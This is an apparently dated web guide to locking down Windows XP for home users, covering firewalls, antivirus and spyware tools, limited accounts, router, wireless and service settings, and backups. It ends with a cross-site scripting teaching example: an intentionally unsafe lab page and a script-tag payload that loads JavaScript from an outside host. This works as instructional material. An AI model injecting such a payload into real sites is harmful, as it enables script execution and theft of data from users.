Windows XP is a complicated and capable operating system, and as such it is difficult to safely lock down. To top it off,
Microsoft products are targets for hackers.
Viruses vs. Worms: Everyone is familiar with the consequences of viruses. Most people are savvy enough not to click on a suspicious file
included on an email. Surprisingly few people know about other vulnerabilites to which they are exposed.
People are less familiar with worms.
The real difference between a virus and a worm is the method of delivery. A virus is a
program that is passed between computers as attachment on an email or on a floppy. Worms are programs that get into your
computer via an open port via an internet connetion. A virus scanner is designed to detect and destroy viruses on the
computer. A firewall is designed to block access in or out of your computer by suspicious programs, which could mean
viruses, worms or other types of suspect software, sometimes called spyware or malware.
Spyware: Spyware is one of a number of categories of programs that are on your computer under suspect pretenses. Spyware can come in
as an included part of a free program. The spyware is sometimes designed to use your internet connection to report
demographic information about you to it's creator. Spyware, malware and other categories of useless programs can steal your
computer's resources, memory and the bandwidth of your internet connection. A spyware detecting program (or two) can
determine which programs are "suspect" and allow you to remove them.
Whether the programs in question are viruses, worms or spyware, any of these may have the capability to "invite" other software into your computer via an open port. This is where good firewall software shines! There is a firewall built into Windows XP Service Pack 2, but it only protects inbound traffic. Once a suspect program is on your machine, it initiates contact with the outside world, and therefore consists of outbound traffic!
The suggestion is to carefully setup your firewall, and deny temporarily any program that asks you for permission to transmit data, either inbound our outbound! The rule of thumb is that if YOU (as the user) did not activate the program that is asking permission to transmit data, then deny it! You can always re-examine your decision at a later time, if your computer's functionality is reduced.
Port Scanners: A port scanner (sniffer) is software that checks for open computer ports. Unscrupulous people can set up programs to sniff for open ports, and can use these ports to gain access to your computer, and do damage. Firewalls help protect against this tactic as well, since the firewall blocks inbound access to your computer.
Operating System Vulnerabilities: Windows, like other operating systems, must be kept up to date. Any Windows user should routinely go to Microsoft's Windows Update site and download and install all the latest patches and updates.
Protect Your System Immediately: A newly installed operating system connecting to the Internet for the first time can be attacked within minutes and compromised in some way. There may not be time to update the software before it is hacked. Therefore, we must always install the firewall (at least) before connecting to the internet! The general advice is to gather all the software you may need in advance (virus scanner, firewall, spyware removers, drivers, etc.) and install and run these prior to connecting to the internet. Here is a link to a PDF file that explains this in more detail:
Windows XP, Surviving The First Day: http://www.sans.org/rr/whitepapers/windows/1298.php
Recommendation: This web page serves as a word to the wise, not a definitive opinion on Windows security. The reader is suggested to do their own research, and do what they feel is best. However, here are some suggested security measures:
1. Install a software firewall on your system. the firewall must be able to set permissions for in and outbound access on a
program-by-program basis.
A great free firewall (zonealarm):
http://www.snapfiles.com/get/zonealarm.html
2. Install and frequently run an Anti-Virus package. (This virus signatures must be kept up to date)
Free anti-virus (AVG Anti-Virus):
http://free.grisoft.com/doc/2/lng/us/tpl/v5
3. Install and occasionally run an Anti-Spyware package, or two or more, if they are compatible and handle spyware in
different ways.
Free Spyware detectors/removers (use at least the first two):
Spybot Search & Destroy (Removes spyware & malware) http://www.snapfiles.com/get/spybot.html
Ad-Aware (Removes spyware & malware) http://www.snapfiles.com/get/adaware.html
SpywareBlaster(Prevents spyware sites from setting cookies, and installing ActiveX based spyware):
http://www.javacoolsoftware.com/spywareblaster.html
SpywareGuard (Prevents spyware .exe and .cab files from being executed as well as prevent browser hijacking):
http://www.javacoolsoftware.com/spywareguard.html
4. Keep your Windows Operating system up to date via WindowsUpdate.
Microsoft Windows Update (Requires IE browser, legal version of Windows): http://windowsupdate.microsoft.com
Microsoft Downloads:
http://www.microsoft.com/downloads/search.aspx?displaylang=en
5. Use your Windows for daily operation (development, browsing, etc.) logged in as a password protected "Limited" user. Do not operate as a user with "Administrative" capabilities unless installing programs.
6. Consider using an alternative browser (such as Firefox) for browsing to untrusted web sites.
7. If you use DSL or a cable modem at home, protect the gateway to your systems with a good hardware gateway/router with at least port blocking (stealthing is even better) and Stateful Packet Inspection (“SPI”).
8. Only use wireless home devices ONLY if you are determined to learn and implement the security measures these provide. If this seems complicated, only use wired devices in your home, especially your home gateway/router!
9. Consider using Microsoft Baseline Security Analyzer to scan your system for further vulnerabilities: http://www.microsoft.com/technet/security/tools/mbsahome.mspx
Below are notes of interest about the items above, and some other issues for good measure.
Gateway Router: If you connect to the Internet via a broadband connection, buy a gateway router (sometimes called a firewall router). Many people buy these to share an Internet connection, not knowing the built-in protection that these devices offer. Even if you only have one computer connected to the Internet you should have this. Configured correctly, it is an excellent first layer of defense against port attacks. Basic gateway routers sell for as little as $50 (US). Netgear & Linksys make popular models. Consider using a "wired only" router, instead of a wireless router. This eliminates intruders from hijacking your internet connection (wardriving).
Anti-Virus Software: Remember to update the virus signatures and RUN your AV software on a regular basis! Simply having it on your machine is not enough! Disconnect While Installing XP While this is an optional step it is highly recommended. This is especially true if you've not installed SP2 or upgraded SP2 over an old installation. There isn't any better way to get rid of viruses and spyware than a format and clean install.
Do not connect to the Internet while installing your operating system. This means disconnecting the cable on the back of your computer that connects you to the Internet (Ethernet, phone line, USB, Firewire, etc.) Install all your protective software before attempting to connect to Microsoft's Windows Update site. Download the most current versions of all your protective software before you reinstall your operating system, so they can be installed before you attempt a first connection.
Backups: Backups are critical to computing these days. Many times it is the files that are important to us, not the hardware we risk. You should consider backing up (making copies of important files) before installing XP updates, major applications, or working with the registry. You should backup your files routinely, anyway. Remember to get files inside the My Documents folder, and any special folders that store files associated with image applications, etc. Do a search to determine where files are on the hard drive. Make a note of these locations in a text file for your reference. If that data is really important to you, consider storing that data at a separate location in case disaster strikes. A trusted family member’s house or a safe deposit box are good locations.
Disk Imaging: The only backup that will truly restore a drive or partition is one that "images" your drives. That is, it makes a byte-by-byte copy of your drive/partition. "Imaging" is the best option for the partition that holds Windows XP. You can choose to backup images to another partition, hard drive, CD/DVD, or another computer. Examples of these programs are Acronis True Image and Norton Ghost.
Duplicate Hard Drive : If getting back up and running quickly is very important to you, consider buying 2 identical hard disks. Do a virgin install (White Wedding) of your operating system and main programs, get them all working, and copy everything to the other hard drive, and remove that drive! Then, when catastrophe strikes, you install the matching drive! Then it is only your personal files you will need. Since you backed them up ROUTINELY to CD (right?) no problem!
A freeware hard drive copying utility is Karen's Replicator: http://www.karenware.com/powertools/ptreplicator.asp
Use a password for all your accounts: XP allows you to not have passwords for your user accounts. Not having a password is a very quick way to get hacked. Ensure that all accounts have a password. Passwords should be a mix of letters (upper and lower case), numbers, and symbols.
Backup your user password: (requires a floppy drive) Go to Start > Settings > Control Panel > User Accounts > click on the name of the account whose password you wish to backup > in the next window, in the upper left of the screen click on “Prevent forgotten password”, the Forgotten Password Wizard will launch. Simply follow the steps in this wizard. If you forget your password at startup XP will ask if you want to use this disk. NOTE: This disk contains the key to unlock your entire system. Lock it away in a safe location. Preferably in a room other than the one that computer is in.
Rename the Administrator account and disable the Guest account (Windows XP Professional only.) Crackers need both a password and a user name to get into your computer. Windows XP Pro comes with a default account called Administrator that has full privileges on your system and Guest that has limited privileges on your system. This gives crackers half of what they need to get into your computer.
Become a Limited User: Unless you state otherwise, all users created for Windows XP are by default Administrators. As such, a worm or virus could commandeer your computer, change your password, and lock you out of your own machine! Using your machine as a "Limited" user ONLY limits the damage if you are overtaken by a worm or virus.
To Create A Limited User Go to Start > Control Panel > User Accounts > and choose Create a new account > in the resulting screen enter a name for this account and click Next > in the resulting choose Limited account > now click Create Account. This takes you back to the User Accounts screen. Click on the account you just created > in the resulting screen choose Create a password > fill in the blanks with the appropriate information.
IMPORTANT: A limited user can't even install programs! To work around this, when you need to install a program, disconnect from the internet, login as an Administrator, and temporarily make your Limited User an Administrator, as well! This way you can install the program with all the desktop icons, etc., and turn around and DOWNGRADE your user back to a Limited User!
NOTE: You do not need to login as an Administrator to do this! You can make yourself LIMITED but you can't make yourself an Administrator! Windows XP will always require one administrator, so reserve one user, and make sure the name of the user is not the word "administrator"!
Disable the Guest Account (XP Pro): While logged in as administrator, Go to Start > Settings > Control Panel > User Accounts >Right-click on the Guest account and choose Properties > in the resulting screen check the box that says Account is disabled > click Apply and OK. A red circle with an X should now be over the icon next to the Guest account.
Disable the Guest account (Windows XP Home) Go to Start > Settings > Control Panel > User Accounts > in the resulting screen click on Change an account > in the resulting screen click on the Guest account > in the resulting screen click on Turn off the guest account > close out the User Accounts screen.
Configure your router Every router is different and you'll have to consult the user guide for your product as to the specifics as to how and what you can configure. Change the default password, since these are available to anyone with the same model. Disable remote administration - ensures people on the outside of your home network can't access your router. Get the latest firmware - Firmware contains the router's operating instructions. Periodically these instructions are updated. Check with your manufacturer's web page to look for updates. Enable port blocking and enable stealth mode if the firewall router supports it.
Configure your firewall software Every software firewall is different. Some will have wizards to walk you through the process. Nonetheless, here are some general rules to follow to “harden” your firewall protections: General rules for configuring software and hardware firewalls Baseline test your current firewall configuration. There are a number of sites which test your firewall, GRC is one. Click on the ShieldsUp link below to allow your system to be scanned, and to be advised of vulnerabilities in your internet connected network:
https://grc.com/x/ne.dll?bh0bkyd2
Then after doing the following re-test your new configuration:
1. Block everything you can at the hardware level before it reaches your system, i.e., at the firewall router.
2. Close everything, all ports/protocols as default. Open only those ports/protocols that you actually need to have open.
3. Prohibit all inbound connections entirely unless you are running a secure VPN.
4. To protect open ports/protocols, always get a hardware router/firewall that has Stateful Packet Inspection.
5. If your router provides MAC address selection, exclude all MAC addresses except those MAC address actually on your LAN.
6. Do exactly the same with software firewalls, but add to that outbound program control.
7. Limit the NAT address range at the router to only enough internal IP addresses to accommodate the systems on your LAN.
8. If your firewall has a "stealth" setting, use it.
Wireless Networks Wireless presents a slightly different set of security considerations. Wireless settings are notoriously difficult to set up, and some seem not to work at all. Many people elect to just connect the wireless devices, and when they work, just leave them set up in this fashion. When this is done, anyone with a computer and a wireless network card can get into the network.
Wardiving is when an unauthorized user connects to a wireless connection either to gain network access or tap into an internet connection. The advice is to only use a "wired" router (not a wireless one) and use a WAP to connect the wireless machines in your home, so you can quickly unplug the intruder from your network when he is detected.
A wireless Access Point (WAP) is a device to connect multiple computers together to network them or share an internet connection. The WAP is analogous to a hub. It does not perform the firewall activities of a router. Go the extra mile to make sure your wireless connection has all the security features functioning. Make a point to download any "firmware" (software upgrades) to your wireless gear, including your wireless network cards.
Most modern wireless firewall routers or Access Points have some additional important security features that should always be set. One important point is that you should generally disable XP's “Wireless Zero” service, and use connectivity software provided by your wireless hardware manufacturer. You should read your hardware's manual for more complete instructions specific to your firewall router or Access Point. Again, always update the firewall router or Access Point firmware to the latest versions. The most critical settings are as follows:
1. Change the “SSID” of your device from the manufacturer's pre-designated name. Disable SSID broadcasting if possible.
2. Always password protect your device with a difficult to duplicate password (discussed earlier), and change the login name if this is supported.
3. If the device has MAC Inclusion/Exclusion (most devices made these days do), exclude all devices by default and permit only the MAC addresses of your wireless devices.
4. Enable wireless encryption at the highest level supported (usually 128 bit encryption), and remember to set the same access code for all your devices. Use the following link for more info on wireless security configuration:
Wireless Networking Security: http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm
Startup Folder Remove any "links" to programs in the startup folder, so they will not automatically start and take up valuable memory when you reboot your machine.
Disabling Services As an advanced means of tweaking (tuning up) your operating system, you could disable services not required by the way you use your computer. Services are either parts of the operating system, or programs that are running in the background while you are using your computer.
Services load and start running whether or not anyone logs into the computer, unlike a program that is launched from the Startup Folder under All Programs. There are two ways to view Services on your computer. The first is to use the MS Configuration Utility by typing msconfig.exe in the Run box accessed via the Start Menu, followed by clicking the Services tab. If you want a quick visual of which items are running or stopped, this is fine, but the information is limited. The preferred way to make changes to services is to launch services.msc from the Run option on the Start Menu.
Msconfig was not included in Windows 2000, but it can be downloaded and added. (See link below) Msconfig.exe is a powerful utility, but the changes it makes apply to the individual user's configuration. If you have more than one user, consider making the changes via services.msc, since changes made in this way are global to all users. It is worthwhile to look at the links below to do some research on services. Any that are not listed are suspect, and could have been installed by a virus or spyware!
Windows services are by default set to either Automatic or Manual. Disabling these services can help make your computer more secure. Read what every service does before you disable it or your computer may cease to function properly! Go to a site like blackviper.com to view the common Windows services:
http://www.blackviper.com/WinXP/servicecfg.htm
All of the services listed there are "Standard" with Windows XP after the installation of Service Pack 2. If you discover something other than those listed, another program installed them. Still unsure? Put your setting to "manual" or the listing under "Safe." Manual allows Windows XP to start the service when it needs to (or when ever it feels like it), but not at boot up.
Depending on your configuration, not all services will start when required while in "Manual" mode. If you find you need a service, place it in Automatic. After reading the descriptions, choose the ones you wish to disable and follow these steps: Press the Windows + R keys, in the resulting box type services.msc and the services snap-in will appear. Scroll down to each service you wish to disable. You disable it by double-clicking on the service, a new window will appear. In that windows go down to the box next Startup type and use the arrow on the right to choose Disabled. Go down to the bottom of that windows and choose Apply and then OK.
Restart when you've finished disabling the services and check to see if you have limited your computer's functionality. Keep a "baseline" list of all the running programs and services you want to keep (and DONT want to keep!!), so when you check at intervals you are repeating the entire process!
Another link for info about shutting down services: http://www.tweakhound.com/xp/security/page_3.htm
How To Use Msconfig:
http://netsquirrel.com/msconfig/
Services Guide For XP:
http://www.theeldergeek.com/services_guide.htm
Inetinfo.exe (File Masquerades) If you are running XP Pro (or Windows 2000 Pro) and your firewall informs you "inetinfo.exe" is asking for permission send information, or worse, to act as a server, it is possible a worm or virus is attempting to gain control over this powerful program, or masquerade as it. inetinfo.exe acts as a web server and is used for various purposes, such as sending e-mail, hosting web sites, etc. It also is responsible for proxy and web server services. However the same or similar file name can be used by spyware or adware programs to attempt to gain access. Other files are targeted for masquerades as well. If you see any files that are using an unusually large amount of resources (See Process Resource Abuse) consider researching these files as being masqueraded by a virus or worm.
Process Resource Abuse Press CTRL +ALT +DEL and click on Processes, then click on CPU and Mem Usage to see which Processes (applications or services) are using what resources. If you see ones that do not belong, or use supiciously large resources, research vulnerabilities with these processes via Google, (etc.) and see if your computer has been compromised by a worm or virus.
File Sharing Turn off Simple File Sharing (This applies to Windows XP Professional only): Windows XP has 2 modes for sharing. The first is called "Simple File Sharing" and the other is referred to as the "Classic security model". Simple File Sharing allows (actually forces) that users access those shares under the Guest account. As you can surmise this isn't the most secure solution even though the Guest account has limited privileges. The Classic security model forces users to have an account on your computer and to authenticate by using the password associated with that account.
How to Turn off Simple File Sharing: Go to Start > Control Panel > Folder Options. In the resulting window, click on the View tab > Under Advanced Settings: scroll all the way to the bottom and uncheck Use simple file sharing (Recommended), click Apply and OK and close out all the open windows.
Limit the use of Internet Explorer Microsoft's Internet Explorer (IE) has many vulnerabilities and it can be used to gain access to your computer. Spyware and malware can access IE and hijack your browser to send it to the web sites of their clients! While no web browser is 100% safe, Consider using Firefox, which is small, fast and designed for developers. If you feel you must use Internet Explorer, be sure you use it only to view trusted websites!
Firefox: http://www.mozilla.org/products/firefox/
Stop Using Outlook Express Consider using an alternative to Outlook Express. One such alternative is Thunderbird from Mozilla. Thunderbird is a FREE email program with built-in spam-blocking.
Stop viewing HTML email and block external images HTML (in very simple terms) is a programming language that allows authors to format documents for the web (in this case, email). The use of HTML in email can allow someone to run unauthorized programs such as a virus or Trojan horse on your computer. In the case of spammers, the use of HTML and pictures in email can confirm the existence of your email address by "calling back" to the author’s web server. This can lead to you getting even more spam (or worse).
Stop using File Sharing Programs Also known as P2P (peer to peer) we use the term “file sharing” rather loosely (we all know what the vast majority of use here is). Not only do these programs open a whole variety of security holes but the content is littered with viruses and Trojans. Stay away from these programs.
Instant Messaging Many of us love the ability to stay in contact with friends and family that instant messaging provides. There are a few simple things you need to consider. If you are going to be “Away” for more than a few minutes LOG OFF. Instant messaging programs open a number of ports into your system. The only way to truly close them is to be logged off. Too many people are signed in and “Away” for far too long, I know people who are “Away” for days at a time. Consider “blocking” all people but the people in your buddy/contacts list from communicating with you. Do not EVER click on a hyperlink in a member’s profile or any hyperlinks from people you don’t know. There have been exploits in the past using these. Last year a family member clicked on a hyperlink in a friend’s profile. It not only downloaded a Trojan but hijacked her profile and inserted the same bad hyperlink into her profile. Most instant messaging programs offer the ability to pass files back and forth to friends and family. Be sure to “block” people who are not in your buddy/contacts list AND to display an “approve” message before accepting.
Keep ALL your programs updated There is no such thing as a secure operating system or program. Exploits for these are found every day. Most (but not all) of these get fixed. The only way for you to get the fix is to update either automatically or manually. The best way to ensure you get these updates is to enable automatic updates in the programs that have this feature. For programs that do not have this feature you’ll have to find out about updates on your own. Make sure the “update” isn’t a “beta” (test) version. READ what the update contains. This information can be found under “what’s new”, changes in version “X”, or the change log. Follow the link provided to the software manufacturers web page, download directly from the software maker when possible. It isn’t always necessary to update to the newest version. If the update doesn’t contain a security updates, fix problems you are experiencing, or contain new features you desire then consider skipping the update.
System Restore: Windows XP has a feature called System Restore that backs up most of the system files. While this feature is far from perfect it can be effective in many situations. System Restore points are (usually) made automatically made “at the time of significant system events” such as when you install a new program or driver. You can also manually create a Restore Point. System Restore is not a true “uninstall” feature or backup. It only monitors and restores key parts of files and the system registry. It can however get you out a jam quickly.
To manually create/restore a restore point: Go to Start > Programs > Accessories > System Tools > System Restore > click on Create a restore point and click Next > in the resulting screen type a name for the restore point, be descriptive i.e.: “b4 new video driver 12/03” then click Create. To restore a system from a restore point: Go to Start > Programs > Accessories > System Tools > System Restore > click on Restore my system to an earlier time and click Next > choose the desired restore point and click Next.
Editing The Registry The Registry is a database used to store settings and options for Windows. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry. The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained separately in the %SystemRoot%\System32\Config directory.
You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes. One such editor is "regedit.exe" that can be used from the run line.
Registry edits are dangerous, and should only be attempted as a last resort. If a registry edit is made improperly, the entire operating system could stop functioning. You can edit the registry to eliminate programs that will not let you uninstall them. There are also powerful "tweaks" that can only be performed by editing the registry directly.
Research what you are doing carefully, before proceeding! With regedit, you can search for and remove Key/Value pairs that reference the offending program. Never work with the registry without backing up the registry, and your important user files first!
You can also make changes by using Registry patches. A Registry patch is a simple text file with the .REG extension that contains one or more keys or values. If you double-click on a .REG file, the patch is applied to the registry. This is a good way to share or back up small portions of the registry for use on your own computer, or someone else's, because (among other reasons) it's much simpler and less dangerous than manually editing the Registry.
You can create a Registry patch by opening the Registry Editor, selecting a branch, and choosing Export from the File menu. Then, specify a filename, and press OK. You can then view the Registry patch file by opening it in Notepad (right-click on it and select Edit). Again, just double-click on a Registry patch file (or use Import in the Registry Editor's File menu) to apply it to the registry.
Registry Guide For Windows:
http://www.winguides.com/registry/
Registry Tweaks for Windows XP (reg files):
http://www.kellys-korner-xp.com/xp_tweaks2.htm
Below are some links to get started in more detail in some related areas of security:
Advanced: Windows XP Security Checklist: http://labmice.techtarget.com/articles/winxpsecuritychecklist.htm
Advanced: Run IPX/SPX on your home network: http://www.tweakhound.com/xp/security/page_4.htm
Advanced: Modify your HOSTS files http://www.tweakhound.com/xp/security/page_5.htm
Advanced Windows XP Security issues: http://labmice.techtarget.com/windowsxp/default.htm
Advanced: XP SP2 Super Tweaks: http://www.tweakhound.com/xp/xptweaks/supertweaks1.htm
Advanced: XP (and other OS) Tips & Tweaks: http://www.blackviper.com/Articles/OS/OSguides.htm
Cross Site Scripting Example:
Safe version (Will not allow exploit):
http://www.billnsara.com/cis212/site16/conceptRTE/rteTest2.asp
Unsafe version (Place code below for XSS example exploit):
http://www.billnsara.com/cis212/site16/conceptRTE/rteUnsafe.asp
XSS Exploit code:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
XSS Exploit Code From:
http://ha.ckers.org/xss.html
Windows XP Security Strategies